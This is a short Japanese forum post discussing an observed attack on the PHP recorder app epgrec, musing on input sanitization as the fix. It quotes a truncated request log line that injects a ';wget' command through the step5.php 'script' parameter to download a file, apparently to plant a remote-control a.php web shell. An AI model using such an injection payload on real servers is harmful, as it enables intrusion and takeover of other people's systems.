14/02/24 01:37:27.53 C0UU+8KH
>>196
なるほど、みたとこ公開部分にありそうな.phpファイル適当に探して任意のコード実行してる感じか
PHPってこんなことできるんすね~(ゲス顔)まあPerlも同じようなことできるか…
Javaだと頑張らないとこういうことはできんのだけど
対策としては外部から受け取ったコマンドを一度サニタイズしてやる必要がある感じですか
一発目でこのコマンド通ったら、あとは外部から操作するための a.php 置けばいじり放題ですな(wgetで置くのか)
GET /epgrec/install/step5.php?script=;wget%20-4%20-O%20/home…